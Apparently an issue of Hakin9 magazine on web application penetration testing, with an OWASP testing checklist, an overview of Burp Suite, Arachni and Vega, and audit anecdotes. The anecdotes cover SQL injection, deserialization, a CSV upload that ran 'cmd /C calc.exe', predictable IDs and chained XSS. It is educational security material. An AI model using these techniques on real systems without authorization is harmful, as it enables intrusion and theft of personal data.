Web Application Penetration Testing
Editor-in-Chief
Joanna Kretowicz
[email protected]
Editors:
Marta Sienicka
[email protected]
Marta Strzelec
[email protected]
Marta Ziemianowicz
[email protected]
Senior Consultant/Publisher:
Paweł Marciniak
CEO:
Joanna Kretowicz
[email protected]
Marketing Director:
Joanna Kretowicz
[email protected]
Publisher
Hakin9 Media Sp. z o.o.
02-676 Warszawa
ul. Postępu 17D
Phone: 1 917 338 3631
www.eforensicsmag.com
All trademarks, trade names, or logos mentioned or used are the property of their respective owners.
The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
word from the team
Dear readers!
Easter is coming, so brace yourselves and take a look at our brand new issue. This time Hakin9 Magazine is completely focused on Web Application Penetration Testing. Are you ready? Then let's go!
We begin with two articles that will introduce you to the topic of Web Application Penetration Testing. If you are
a beginner and would like to understand what this is all about, then you are in the right place: first, Amit Kapoor
will introduce you to the world of Web Pentesting, and then Andrea Cavallini will take you through an overview
of Web Pentesting Tools.
After this introduction we can move to more technical and advanced articles. We start with Carlos Castro, who will show you how to use both Google and Nmap in the scanning process. And then, in case you've always wanted to learn how to use OWASP ZAP Proxy in Web Applications, you will have a chance to do that, thanks to Cory Miller, who very thoroughly described the entire subject.
In the middle of the issue we will take a small break from Web Application Penetration Testing. Samrat Das, one
of our best authors (some of you might have read his article in the previous issue), presents you with a piece on
Reverse Engineering. You definitely should read this one - it’s not your typical article, but I don’t want to spoil
the surprise!
After that we’re back to WAPT, but with a little hacking this time! How to hack with SQLmap is an article every
hacker and penetration tester should read. Sumit Kumar Soni describes step by step how to use SQLmap for
hacking. Continuing the trend, you should take a look at the article Gilles Lami prepared for more advanced readers, about the most important techniques and attacks used in WAPT. Next, we have Web Applications In The Modern World written by Hashem Ahmad - sounds mysterious, right? But don't be fooled, this article is strictly technical and focused on XSS.
Our last article is different from the others. Courtesy of Alexandre D'Hondt & Hussein Bahmad, students of Université Catholique de Louvain-la-Neuve, we present their article about Understanding SCAP Through a Simple Use Case.
And that's it! We hope that you will enjoy this issue. Remember, we are always open to your feedback, and don't forget to visit our blog and social media as well.
Web Application Penetration Testing
Introduction
by Amit Kapoor
They say that life is too short to make all the mistakes yourself, and that you must learn
from the experience of others. I believe that the vastness of knowledge also falls in a
similar category. You simply cannot learn everything, and must acquire the knowledge
of others. At times it is enough to refer to the masters for explanation of topics that have
already been researched thoroughly.
Web Application Penetration Testing is a topic that has been researched so much, and in such great detail, that you may feel it has been beaten to death. But then again, there are a lot of us who may be coming across the terminology for the first time.
I have referred to the Open Web Application Security Project (OWASP) web application security testing methodology and, to keep it simple, I discuss Web Application Testing at a very high level, highlighting the various (vast) areas that it covers.
While security tests are used to evaluate the integrity and security of applications and systems by means of
validation and verification, testing the security of a web application involves evaluating the inherent security of
the application.
Exhaustive security testing (though never truly possible) helps expose the loopholes (weaknesses in a system's design, implementation, operation, or management) and technical glitches of an application, along with the risk of its data coming under threat from hackers and malware. The resulting report, along with a plan for risk mitigation, is shared with the creator of the web application.
For the implementation of Web Application Penetration Testing, it is recommended to carry out the following 10 activities:
1. Information Gathering
2. Configuration and Deployment Management Testing
3. Identity Management Testing
4. Authentication Testing
5. Authorization Testing
6. Session Management Testing
7. Input Validation Testing
8. Error Handling
9. Business Logic Testing
10. Client Side Testing
The following sections briefly describe the above-listed activities, and the sub-activities that need to be conducted as part of each specific activity.
Information Gathering
Testing for Information Gathering includes the following activities:
1. Conducting Search Engine Discovery and Reconnaissance for Information Leakage
2. Fingerprinting the Web Server
3. Reviewing Webserver Metafiles for Information Leakage
4. Enumerating Applications on Webserver
5. Reviewing Webpage Comments and Metadata for Information Leakage
6. Identifying Application Entry Points
7. Mapping Execution Paths through Application
8. Fingerprinting Web Application Framework
9. Fingerprinting the Web Application
10. Mapping Application Architecture
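Activity 2 above, fingerprinting the web server, can be sketched in a few lines: identification headers are simply read out of the HTTP response. The sample response below is illustrative, not taken from a real host.

```python
def fingerprint(raw_response: str) -> dict:
    """Extract identification headers from a raw HTTP response."""
    banner = {}
    for line in raw_response.split("\r\n"):
        if not line:                     # blank line ends the header section
            break
        if ":" in line:
            name, _, value = line.partition(":")
            if name.strip().lower() in ("server", "x-powered-by"):
                banner[name.strip().lower()] = value.strip()
    return banner

sample = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.18 (Ubuntu)\r\n"
    "X-Powered-By: PHP/5.6.11\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)
```

In practice a fingerprinting tool also compares response behaviour (header ordering, error pages) rather than trusting the banner, which administrators can change freely.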
8. Testing RIA cross domain policy
Authentication Testing
In terms of computer security, authentication is the process of verifying the digital identity of a communicator, for example, the true identity of someone logging in to the system. Authentication testing helps ensure the genuineness of a product and depends upon one or more authentication factors. Authentication testing involves testing for:
1. Credentials Transported over an Encrypted Channel
2. Default Credentials
3. Weak Lock-out Mechanism
4. Bypassing Authentication Schema
5. Remember password functionality
6. Browser Cache Weakness
7. Weak Password Policy
8. Weak Security Question/Answer
9. Weak Password Change or Reset Functionalities
10. Weaker Authentication in Alternative Channel
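Item 7 above, a weak password policy, is often probed with a small checker like the following. This is a minimal sketch, not from the OWASP guide: a length floor, four character classes, and a tiny blacklist of common passwords stand in for a real policy.

```python
import re

# Illustrative blacklist; real deployments use large leaked-password lists.
COMMON = {"password", "123456", "qwerty", "letmein", "admin"}

def is_strong(password: str) -> bool:
    """Return True if the password satisfies a basic strength policy."""
    if len(password) < 10 or password.lower() in COMMON:
        return False
    # Require lowercase, uppercase, digit, and a special character.
    checks = [r"[a-z]", r"[A-Z]", r"[0-9]", r"[^a-zA-Z0-9]"]
    return all(re.search(c, password) for c in checks)
```

A tester tries registration and password-change forms with deliberately weak values to see whether the application enforces anything like this server-side, not merely in client-side JavaScript.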
Authorization Testing
Authorization controls the aspect of whether or not someone should be allowed to access a system.
Authorization Testing thus helps crosscheck the permissions of someone trying to log in to a system.
Because the process of authorization comes after authentication testing is successful, authorization
testing tests the directory traversal/files and also involves testing for:
1. Bypassing Authorization Schema
2. Privilege Escalation
3. Insecure Direct Object References
Session Management Testing
Session Management is a core activity as it is the mechanism that controls all interactions between a
user and the web-based application - from the time before logging in to what happens after logging
out. The ways in which a web application interacts with a user are dependent upon the nature of the
site, the security, and availability requirements of the application.
Whilst there are accepted best practices for application development, such as those outlined in the OWASP Guide to Building Secure Web Applications, it is very important that application security is considered within the realm of the requirements and expectations.
Session Management Testing covers testing for:
1. Bypassing Session Management Schema
2. Cookies Attributes
3. Session Fixation
4. Exposed Session Variables
5. Cross Site Request Forgery (CSRF)
6. Logout Functionality
7. Session Timeouts
8. Session Puzzling
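Item 5 above, CSRF, is defended against by tying a random token to the session and rejecting state-changing requests that do not echo it. The following is an assumed minimal sketch of that pattern, not code from the article:

```python
import hashlib
import hmac
import secrets

SECRET_KEY = secrets.token_bytes(32)   # per-application secret

def issue_token(session_id: str) -> str:
    """Derive a CSRF token bound to the user's session."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def verify_token(session_id: str, token: str) -> bool:
    """Constant-time comparison avoids timing side channels."""
    return hmac.compare_digest(issue_token(session_id), token)
```

During testing, one removes or swaps the token between two sessions; if the request still succeeds, the schema is bypassable.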
will be interpreted by SSI mechanisms. A system is vulnerable if an attacker can inject
code into HTML pages or perform remote code execution.
9. XPath Injection Testing: This tests the possibility of injecting data into an application
so that it executes user-controlled XPath queries. A system is vulnerable if an attacker
is able to bypass authentication mechanisms or access information without proper
authorization.
10. IMAP/SMTP Injection Testing: This tests the possibility of injecting arbitrary
IMAP/SMTP commands into the mail servers.
11. Code Injection Testing: This tests the possibility of injecting data into an application
that may be executed by the web server.
12. OS Commanding Testing: This tests the possibility of injecting an OS command
through an HTTP request into the application.
13. Buffer Overflow Testing: This tests for different types of buffer overflow vulnerabilities
such as Heap overflow, Stack overflow, and Format string.
14. Incubated Vulnerability Testing: This is a complex test that needs more than one data
validation vulnerability to work.
15. Testing for HTTP Splitting/Smuggling: This describes how to test for HTTP Exploits,
such as HTTP Verb, HTTP Splitting, and HTTP Smuggling.
The goal of testing is to verify that the application actually performs validation and thus does not trust its input.
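Item 12 above, OS Commanding, can be illustrated with a short sketch (assuming a POSIX system with an `echo` binary; the "ping" wrapper is hypothetical). Passing user input into a shell string lets metacharacters like ";" start a second command, while passing it as an argument-vector element keeps it a literal string:

```python
import subprocess

def ping_unsafe(host: str) -> str:
    # VULNERABLE: host is interpolated into a shell command line.
    return subprocess.run("echo pinging " + host, shell=True,
                          capture_output=True, text=True).stdout

def ping_safe(host: str) -> str:
    # Safe: host is a single argv element, never parsed by a shell.
    return subprocess.run(["echo", "pinging", host],
                          capture_output=True, text=True).stdout

payload = "example.com; echo INJECTED"
```

With the unsafe variant, the payload's second command runs; with the safe variant, the whole string is echoed back as inert text.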
Error Handling
Reviewing error handling code verifies whether or not an application fails safely under all possible error conditions, expected or unexpected. A well-planned error/exception handling strategy is important for three reasons:
1. It does not give attackers any information that may help in attacking the application.
2. It is easier to maintain and reduces the chance of any uncaught errors.
3. If not implemented properly, information leakage can lead to business-critical
vulnerabilities.
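The "fail safely" principle above can be sketched as follows (an assumed pattern, not code from the article): the client receives only a generic message with an opaque incident ID, while the full traceback goes to the server-side log.

```python
import logging
import uuid

log = logging.getLogger("app")

def handle(operation):
    """Run an operation; never leak exception details to the client."""
    try:
        return operation()
    except Exception:
        incident = uuid.uuid4().hex
        log.exception("incident %s", incident)   # full detail, server side only
        return "An internal error occurred (ref %s)." % incident
```

A tester probes this by forcing unexpected inputs and checking whether stack traces, SQL errors, or file paths leak into the response.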
1. Test Business Logic Data Validation: This helps to verify whether or not users can
insert unauthorized data into the system/application.
2. Test Ability to Forge Requests: This helps to verify whether or not users can
submit/alter data to the system for which they are not authorized.
3. Test Integrity Checks: This helps to verify whether or not users can destroy the
integrity of any part of the system or its data.
4. Test for Process Timing: This helps to verify whether or not users can manipulate a
system/guess behavior based on input or output timing.
5. Test Number of Times a Function can be Used Limits: This helps to verify whether or
not users can use part of an application/function more than the number of times
required by the workflow.
6. Testing for the Circumvention of Work Flows: This helps to verify whether or not users
can perform actions that are out of bounds of the approved workflow.
7. Test Defenses against Application Misuse: This helps to verify whether or not users can
manipulate the application in a manner not intended.
8. Test Upload of Unexpected File Types: This helps to verify whether or not users can
upload unexpected file types that are not per the business workflow.
9. Test Upload of Malicious Files: This helps to verify whether or not users can upload
potentially malicious files to the system that may be harmful to the system security.
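Test 5 above, limiting the number of times a function can be used, targets controls like the following sketch (hypothetical, for illustration): think of a discount code that must only be redeemable once per user.

```python
from collections import defaultdict

class UsageLimiter:
    """Enforce a per-user cap on how often an action may be invoked."""

    def __init__(self, limit: int):
        self.limit = limit
        self.counts = defaultdict(int)

    def try_use(self, user: str, action: str) -> bool:
        """Allow the action only while the user is under the limit."""
        key = (user, action)
        if self.counts[key] >= self.limit:
            return False
        self.counts[key] += 1
        return True
```

The test consists of replaying the same request beyond the workflow's limit and checking whether the server actually refuses it.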
Client-Side Testing
Client-Side testing addresses code execution on the client side, usually within a web browser or browser plugin. The execution of code on the client side is distinct from executing it on the server and returning the subsequent content. Client-Side testing involves testing for:
1. DOM based Cross Site Scripting
2. JavaScript Execution
3. HTML Injection
4. Client-Side URL Redirect
5. CSS Injection
6. Client-Side Resource Manipulation
7. Cross Origin Resource Sharing
8. Cross-Site Flashing
9. Clickjacking
10. WebSockets
11. Web Messaging
12. Local Storage
Conclusion
For further in-depth reading on all the areas mentioned above, I suggest you visit the Open Web Application Security Project (OWASP) web application security testing methodology, on which this article is based.
@amitwritesat and
https://in.linkedin.com/in/kapooramit
Web Applications Penetration Testing Tools - Overview
by Andrea Cavallini
Burp is made up of a set of tools that enable a detailed analysis of vulnerabilities. Its features are:
• Proxy, which creates a stream between browser and application through a TCP socket. In this stream we can find all HTTP and HTTPS traffic; we can modify a message and send it on modified. The analysis of the traffic allows the creation of the site map
• Scanner, a tool that checks the application for many types of known vulnerabilities with standard or customizable algorithms
• Spider, which analyses the content of web servers and can force the discovery of standard contents with the crawling technique
• Intruder, a tool that can modify a past request captured with the proxy and use it to try customizable exploits
• Repeater, which resends captured or crafted requests
• Sequencer, which verifies and sends requests with fuzz strings for testing
• Comparer, which checks all the differences between two captured requests
• Decoder, which decodes parts of a message with many decoding algorithms in order to make them readable and analyzable
• Extender, which permits the use of customizable scripts from the command line
I am going to introduce the tools of Burp Suite in detail, with a simple explanation.
Proxy
Proxy is the first step of our analysis. It creates a TCP stream, like a man-in-the-middle vector, and intercepts the requests from the browser to the web (the answers can be intercepted as well, in this case from the network to the client). Proxy can block the requests until the pentester decides on an action. The requests (or the answers) can be:
• forwarded (the navigation continues normally)
• denied (which means that the navigation of this specific request is interrupted)
• elaborated, with the modification of the body and the header, and resent, internally to Burp, to the other tools in order to analyze other vulnerabilities.
The information intercepted can be filtered with specific strings or regular expressions; therefore, the
analysis is simplified.
As soon as traffic is intercepted, the proxy automatically begins to save the requests and elaborates the structure of the website. This action, which is called site mapping, is useful for the analysis of the structure of the platform.
As far as the HTTP or HTTPS traffic is concerned, there are two different ways to proceed: the automatic approach with the scanner, typically used at the beginning of the analysis, or personalized methods of research, used after studying the platform and its functionalities.
Scanner
The automatic scanning searches for the most common vulnerabilities. The initial scanning is passive because we use the traffic that the proxy intercepted previously (we can use the active mode, but the traffic will be increased). Finally, a report is generated when the analysis ends. It is exportable, analyzable, and provides a first glance at our findings.
Taking a step back, the proxy memorizes the structure of the application. This action starts from the document root, proceeds top down, and offers a tree view of the environment that we are analyzing. This is useful to learn which pages or functionalities exist (we must have access to these resources) so we can try to exploit them. In this phase, the tool can find all the subdomains, and other domains tied to the host, with their mapping of available directories and pages.
Spider
The spider, another tool in Burp Suite, can crawl the contents of the application. This action starts with the most common names of HTML contents; it is customizable and works on the navigable contents, including hidden components.
When these first steps end, after the analysis of the reports and the spider results, we can start to attack the environment with more focused exploits. In this work, the tool called Intruder will be our best friend.
Intruder
The Intruder is the most important tool that we can use to exploit the application. Once we have grouped a set of requests or answers (because we cannot forget that we can also intercept the answers from the website to our browser), we define a part of the message. We can alter this with a string called a payload and use it as our attack vector. Now we are ready to choose the actual attack algorithm and start the analysis of zero-day vulnerabilities. At the end of this phase, a report is produced and the results are verified.
The power of Intruder is the flexibility of its attacks: it can switch from fuzz strings to dictionaries, and it has many algorithms for our payloads.
The attacks that can be used are:
• Sniper, which uses a single set of inputs on a single parameter to test it, without modifying the others. This mode is typically used to test forms with two parameters, one of which we know
• Battering Ram, which uses a single set of inputs on all parameters to test them. This mode is typically used to test forms with multiple fields
• Pitchfork, which uses many sets of inputs
• Cluster Bomb, which uses many sets of inputs to test all the parameters in all combinations. This mode is typically used for brute-forcing
Additionally, we have other tools that can be used to find vulnerabilities:
• Repeater, used to elaborate a request previously intercepted by the proxy and resend it, modified or not
• Sequencer, typically used for brute-forcing tokens created by the application
Overview of Arachni
Arachni (http://www.arachni-scanner.com/download/) is an open source Ruby application developed by the Arachni-scanner Project. Ruby, and in general the type of implementation used for Arachni, allows customizing the tool with new scripts.
This tool works with:
• a command line, from the bash environment
• a web interface, from the browser over a TCP stream connection
The best feature of this tool is its auto-learning process, because it can understand and learn the components of the application for the next step of the scanning.
Arachni has modules that can be configured at startup, like the xss or audit module. From the command line, the tool can return a verbose output with all the operations that it performs, and at the end it can generate a report with a summary of the test.
The web interface is a simplified version of this tool, because from the browser the shell commands are launched without requiring detailed skill from the user.
Arachni also has an embedded web browser that allows it to attack JavaScript, sessions, and HTML5 scripts as well.
Vega scanner
This scanner executes the most important scanning actions (crawling and automatic processing of forms and links) to find all breaking points and test them for injections. This is possible with modules (written in JavaScript) that submit the requests, also using fuzzed parameters.
Vega proxy
The intercepting proxy is a feature like Burp Suite's: it can intercept requests between browser and application over a TCP stream (the same man-in-the-middle approach as Burp) and decide how to handle each message, by forwarding it, blocking it, or modifying and then forwarding it for analysis.
Conclusion
Burp Suite, Arachni, and Vega are three similar tools because their aim is the same, i.e. to verify the security of a web application.
A proxy can help the pentester to exploit, trying to find particular pages or features with possible injections. This is only possible with the pentester's experience, because exploiting an application is hard.
Arachni is important for the first steps because the scanner is fast. Vega and Burp Suite are important for analyzing particular injections. If we consider that these tools are included in all distributions for WAPT, we can describe them with a single word: essential.
Web Application Penetration Testing – Beyond Standard Tests
Watching TV, gathering information, interacting with friends and family or buying
groceries: the internet gains more and more functionality by the day. Putting a new
service on the web becomes easier every day with simple scripting languages, such as
PHP and JavaScript, as well as content management systems (CMS) that provide all the
basic functionality. Given these possibilities only one question remains: are they safe to
use?
What makes web applications difficult to secure is that an attacker can attack the target on several layers: the operating system, the web server, the executing engine, the application and possibly the transport encryption.
So, in theory, and depending on the threat model, one has to secure every OSI layer by itself. And shutting
everybody out is not possible as this would reduce the functionality of the web application to zero. This dilemma
is then solved by making compromises. An example would be supporting ciphers in cipher block chaining mode
(CBC). There are known attacks on encryption algorithms using this mode, so from the security perspective, they
should not be allowed. Ciphers without known attacks on them are only present in TLS 1.2, a soon-to-be 8-year-old standard which is still not supported by all currently used browsers, e.g. IE 10; the browser in Android 4.4 has it disabled by default, and older browsers do not support it at all. Such compromises should be avoided and, luckily, there are many tools available that detect outdated software and insecure configurations, such as Nessus Vulnerability Scanner [1] or OpenVAS [2]. There are even tools that attempt to test web applications for common vulnerabilities, such as Acunetix [3] or w3af [4]. But especially in the latter case, penetration testing web applications, much like in the game Go, programs are still easily beaten by skilled humans. In the following article we present the process of how to thoroughly test web applications.
Before starting a penetration test, it is important to collect as much information as possible about the target. This
includes details about the network architecture, e.g. are load balancers, (web application) firewalls or reverse
proxies in place, can the application be found under different URLs and possibly the operating system (OS), web
server and framework name and version.
Then, the first step of a web application penetration test should always include a test of the underlying
architecture. The OS, the web server and the used framework to run the web application should be checked for
known vulnerabilities and possible security misconfigurations. In terms of the current OWASP Top 10 from
2013, this covers A9 – Using Components with Known Vulnerabilities and parts of A5 – Security
Misconfigurations. This part can be automated using a range of tools. Comparing a found version
string against a list of version strings with known vulnerabilities is a task a computer is really good at
and much faster than a human being.
When the basics are covered, or while some tool is checking the basics, a site map of the web
application is needed. This process is also called “Spidering”, which means to follow every link on a
site to identify the general functionality of the application as well as to discover points of interest, e.g.
web forms. This is a task where tool support is readily available, e.g. WebScarab [5] or Dirbuster [6]. It is
important that the tools are properly configured, as e.g. hitting a “Logout” link might severely change
the outcome or crawling linked sites that belong to other domains might even have legal
consequences.
Once the tester is confident that he has found every point of interest, the actual testing of the
application’s functionality starts. These tests are usually carried out one functionality after another,
e.g. completely test the login form before moving on to the contact form.
Finding parameters
Testing a single functionality follows the same principle as the whole penetration test: First, one has
to gather all the information possible and then use that information in the test. In the case of a single
form, this means to identify all the parameters that could be used to interact with the web
application. In our experience, especially for more experienced testers, it is more often the case that a parameter is not found at all than that the identified parameters are tested incompletely. Of course, every tester will remember to check all form parameters for injection, SQL, HTML (including Cross-Site Scripting, XSS for short) or otherwise, as most of them are revealed by simple fuzzing [7]. Others are not that widely known, and some which are often forgotten are listed in the following.
HTTP parameters: A first additional parameter can be found in the HTTP method with which a form is submitted, as GET, POST and PUT may lead to different results. Intercepting proxies might offer the functionality to quickly change the method with which the request is sent to the server.
Then, the rest of the request header can be included into the set of parameters. Cookies are often a
parameter that is not checked for SQL injection, but also, other headers might be parsed by the
application and not be properly escaped. One of the parameters most often forgotten is the URL. The
current URL is often included into the HTML that is returned back to the client which again makes it
a potential delivery method for XSS attacks. An online shop might perhaps use URLs in the form of
“www.online-shop.com/products/books/123456” and include that URL in the response body, but the
“/books” part is only there for user guidance and the product is identified only by the trailing ID.
Therefore, replacing “books” by any JavaScript code might actually lead to the code being executed in
the client’s browser.
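The URL-reflection flaw just described can be sketched in a few lines. The page template here is hypothetical; the point is the difference escaping makes when the requested path is echoed into the response body:

```python
import html

def render_unsafe(path: str) -> str:
    # VULNERABLE: the path is embedded verbatim in the HTML.
    return "<p>You are here: %s</p>" % path

def render_safe(path: str) -> str:
    # Escaping turns markup characters into harmless entities.
    return "<p>You are here: %s</p>" % html.escape(path)

attack = "/products/<script>alert(1)</script>/123456"
```

Against the unsafe renderer the payload survives as live markup; the safe renderer emits only `&lt;script&gt;` entities.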
Forms: The most attractive kind of form is the file upload. Being given the possibility to put chosen content on the server is a penetration tester's dream. In the best case scenario, uploaded code can be executed and the system can be fully compromised. Usually, one has to determine what files can be uploaded, how they are stored, and if and how they are processed on the server. A website with image upload capabilities might, for example, enforce the file type by checking the file extension, but not check the content for a matching file type header. In the case of JPG, the server would have to check that the file starts with the two bytes "\FF\D8". Skipping this check would allow an attacker to upload arbitrary files as long as the last few characters of the file name match. Uploading files provides a number of parameters: the file name, its size and content, the file type one specifies in the request when uploading it, and how it is stored on the server (think file system or database).
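The server-side content check described above amounts to comparing the first bytes of the upload against the JPEG Start-of-Image marker, instead of trusting the file extension:

```python
# JPEG files begin with the Start-of-Image marker \xFF\xD8.
JPEG_MAGIC = b"\xff\xd8"

def looks_like_jpeg(data: bytes) -> bool:
    """Check the first two bytes against the JPEG file header."""
    return data[:2] == JPEG_MAGIC
```

A magic-byte check alone is still not sufficient (polyglot files exist that are both valid JPEG and executable script), but its absence is exactly the gap the attacker in the example exploits.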
Of course, file uploads and more general forms on the website are planned interaction points, so they
tend to be covered security-wise by the developers.
Guessable parameters: A tester should look further than forms, for example, at hidden functionality. As programmers try to name functions concisely and logically, a function named "addUser" might indicate that a function named "editUser" exists. The same applies to REST APIs: where "POST" is allowed to create a user on the "/user" route, "PUT" and "DELETE" might be allowed on "/user/<ID>". Another vulnerable spot of web applications are the plugins of the used CMS.
As they are exposed to less scrutiny, software bugs are more likely to be found there. The names of
the used plugins can usually be found in the HTML, some CSS files or the included JavaScript files.
Of course, the retrieval of information has to be tested, too. Being able to access personal information
of another user is a severe defect in a web application. These are often linked to a user ID, which
should by now already be on the list of parameters to play with. Can the ID be guessed or calculated?
Easily guessable IDs are sequential integers. Calculations might be based on the current time or a weak random function, e.g. Java's "java.util.Random" class, where all future values can be calculated after observing two generated numbers in sequence [8].
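The java.util.Random weakness mentioned above can be demonstrated directly: it is a 48-bit linear congruential generator (constants from the Java specification), so after observing two consecutive 32-bit outputs one can brute-force the 16 unobserved low bits of the state and predict every future value. A Python sketch (outputs treated as unsigned for simplicity):

```python
MASK = (1 << 48) - 1
MULT = 0x5DEECE66D
INC = 0xB

def step(state):
    """Advance the LCG; return (new_state, 32-bit output)."""
    state = (state * MULT + INC) & MASK
    return state, state >> 16

def recover_state(out1, out2):
    """Find the internal state from two consecutive outputs."""
    for low in range(1 << 16):            # only 65536 candidates
        candidate = (out1 << 16) | low
        nxt, produced = step(candidate)
        if produced == out2:
            return nxt                    # state after emitting out2
    return None

# Demo: a "secret" generator whose third output we predict.
secret = 0x1234ABCD5678 & MASK
s, v1 = step(secret)
s, v2 = step(s)
s, v3 = step(s)

state = recover_state(v1, v2)
_, predicted = step(state)
```

If session or object IDs are derived from such a generator, an attacker who sees two of them can enumerate all the rest.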
Testing parameters
After enumerating all parameters, the tests can finally start. As mentioned above, the first tests will
probably be checking all form fields for injection by fuzzing. Fuzzing also reveals the range of legal
values. This can then be used to further improve sample attacks that exploit potential flaws. Testing a
web application is difficult as each one is different. This is where a tester’s experience and
background really shine.
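The fuzzing step described above can be sketched as a toy harness. The form handler here is a deliberately naive, hypothetical stand-in; the harness submits classic probe strings and flags any that come back reflected verbatim:

```python
PROBES = [
    "'",                           # breaks naive SQL string literals
    "<script>alert(1)</script>",   # classic XSS probe
    "{{7*7}}",                     # template-injection probe
    "A" * 1024,                    # oversized input / length handling
]

def naive_handler(value: str) -> str:
    """Hypothetical vulnerable endpoint: echoes input into HTML."""
    return "<p>Hello, %s!</p>" % value

def fuzz(handler):
    """Return the probes that the handler reflects verbatim."""
    return [p for p in PROBES if p in handler(p)]

findings = fuzz(naive_handler)
```

Real fuzzers also watch status codes, error messages, and timing, which is how the range of legal values mentioned above is mapped out.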
16
Programming experience might give useful insights. Imagining how a certain behaviour of an application could be reflected in source code might help in finding security holes. A famous example of this is "Drupalgeddon" [9], where a security firm figured out that by passing an array instead of a single variable to the application, one could circumvent the SQL injection filters and, therefore, execute arbitrary SQL code.
Experience with data formats can give new insights. An XML parser of a SOAP API that processes
external entities might leak information. There is no general advice on how to proceed, as each
application is different and has to be tested on its own. One has to just work through the data the
application offers and evaluate it for potential risk factors.
Interesting findings
This section gives a handful of examples to give penetration testers some hints on how to think, where to look, and what to dig for.
A recent interesting finding was the deserialization of PHP objects in the “User-Agent” header in
Joomla, a CMS based on PHP. Due to not properly handling user input, it was possible to gain
remote code execution via a serialised PHP object that was injected in the “User-Agent” header. The
attack was later improved by moving the attack code to the “X-Forwarded-For” header, as this makes
it invisible to standard Apache logs. Keeping in mind that the vulnerability was only detected by
looking at server logs, this is a huge improvement.
While auditing a patient data administration platform in use at several healthcare organisations in
Europe, we discovered an SQL injection in the session cookie before authentication. Using this flaw,
we were able to access all the patient data and to dump the password hash of the administrative user.
Lucky for us, the passwords were hashed using SHA1, which allowed a fairly fast brute-force attack
on the hash. This led to the complete compromise of the system.
In another penetration test, Oneconsult found a custom web server implementation. The scope was
then extended to include a security code review of the web server. The source code revealed a buffer
overflow in the argument collection. When a variable was provided twice, once as a regular variable and once as an array, the buffer length was calculated using the length of the first variable. By exploiting this overflow, remote code execution was achieved.
A security code review is a really powerful tool, in general. The tester gains perfect information and
can analyse the application’s behaviour on any input. When auditing an application based on open
source software, e.g. WordPress (especially the plugins), this can be a great addition to a test-based
audit. Security code reviews take up a considerable amount of resources when done correctly, so
some planning is required.
Macro in CSV
While auditing a web application that provides file upload capabilities, our team discovered that a) CSV files can be uploaded and b) the file will be evaluated by the server. This allowed a request to be sent to the server containing a string that translates to "cmd /C calc.exe", which was then executed on the server.
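The pattern behind this finding is CSV formula injection: a cell beginning with a formula trigger character is evaluated rather than treated as data. A common mitigation, sketched below under the assumption that cells are plain strings (the payload shown is a hypothetical example in the style of the finding, not the audited application's), is to neutralize such cells with a leading apostrophe:

```python
# Characters that make spreadsheet software treat a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@")

def sanitize_cell(cell: str) -> str:
    """Prefix formula-looking cells so they are treated as text."""
    if cell.startswith(FORMULA_TRIGGERS):
        return "'" + cell
    return cell

# A payload in the style of the finding above (hypothetical example).
malicious = "=cmd|'/C calc.exe'!A0"
```

When the server itself evaluates the CSV, sanitization must of course happen before evaluation, or the evaluation step must be removed entirely.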
Aggregation of findings
Sometimes, several smaller findings can be combined to create a more serious vulnerability. One
good example would be the “Magento” Remote Code Execution vulnerability that was discovered in
January 2015 [10]. A similar case, where small vulnerabilities could be combined into something larger,
was discovered in one of our audits. The website allowed users to upload their job application,
including profile picture and CV. This platform had three flaws that could be combined to imitate the
login form or distribute malware through a legitimate URL.
The first flaw was that the content-type of an uploaded image could be changed to any value. Combined
with the fact that the file content itself was not checked, any file could be uploaded to the server
under any content-type. The second flaw was that the profile pictures of other users could be accessed
by anyone who was logged in. This is bad for privacy reasons on its own, but it also means an attacker
can send a link to a manipulated profile picture to any other person. The third flaw was a persistent
XSS in the profile page, which could only include sources from the same page, not from anywhere on the
internet. Combined, these three flaws allow an attacker to hide malware in a profile picture,
distribute a legitimate-looking link to the application page to anybody on the internet, and have the
payload execute via the XSS as soon as a victim clicks the link.
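The first flaw would have been closed by a server-side consistency check. A hedged sketch of such a check, comparing the declared content-type against the file's magic bytes (a minimal allow-list for illustration; a real upload handler needs more):

```python
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}

def sniff(data):
    """Return the content type implied by the file's magic bytes, if any."""
    for magic, ctype in MAGIC.items():
        if data.startswith(magic):
            return ctype
    return None

def upload_is_consistent(declared_type, data):
    """Accept the upload only if the declared type matches the actual bytes."""
    return sniff(data) == declared_type

# An HTML/script payload declared as a PNG is rejected; a real PNG passes.
print(upload_is_consistent("image/png", b"<script>alert('XSS')</script>"))  # False
print(upload_is_consistent("image/png", b"\x89PNG\r\n\x1a\n...."))          # True
```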
Conclusion
This article showed that web applications are difficult to build and operate securely, as so many
details have to be considered and properly addressed. The same holds for the penetration tester: just
as many details have to be considered and properly tested. Experience, and the constant drive to
evolve as the attacks do, is needed to be an asset to a client. Careful development and deployment of
a web application are important steps in securing it against outside threats. Penetration tests are
helpful because they bring a distinct perspective to the development and deployment team and improve
security awareness.
REFERENCES:
1. Nessus: https://www.tenable.com/products/nessus-vulnerability-scanner
2. OpenVAS: http://www.openvas.org
3. Acunetix WVS: https://www.acunetix.com/vulnerability-scanner/
4. w3af: http://w3af.org/
9. Official description: https://www.drupal.org/SA-CORE-2014-005
SCANNING WEAKNESSES WITH GOOGLE AND NMAP
INTRODUCTION TO SCANNING PHASE AND TIPS ON GOOGLE AND NMAP USAGE
by Carlos Castro
In this introductory article, there is a description of what should be done at the scanning
phase of an investigation and how to use a search engine like Google, and a utility like
NMap, to help discover a system's vulnerabilities. The approach using Google's search
engine will show how some vulnerable systems can be found with a combination of
search operators. Furthermore, the NMap section will show how to check a specific
target for vulnerabilities.
INTRODUCTION
Regardless of what is motivating the scanning work, a good plan made in advance will always reduce the
risk of wasting time; so plan, think about the risks, and lay out your tools, because as United States
President Dwight Eisenhower said, "Plans are nothing; planning is everything". Try to think of what
could occur during the job: simulate in your mind what could happen, the possible surprises, and how
you would react to each one.
The preliminary investigation should also produce a plan and notes that can be quickly accessed during the
scanning work. Things you have already discovered about the target, cautions and protective measures to be
taken during the scan, the strategy that seems appropriate, and the techniques that will be used must be at hand.
SCANNING OBJECTIVES
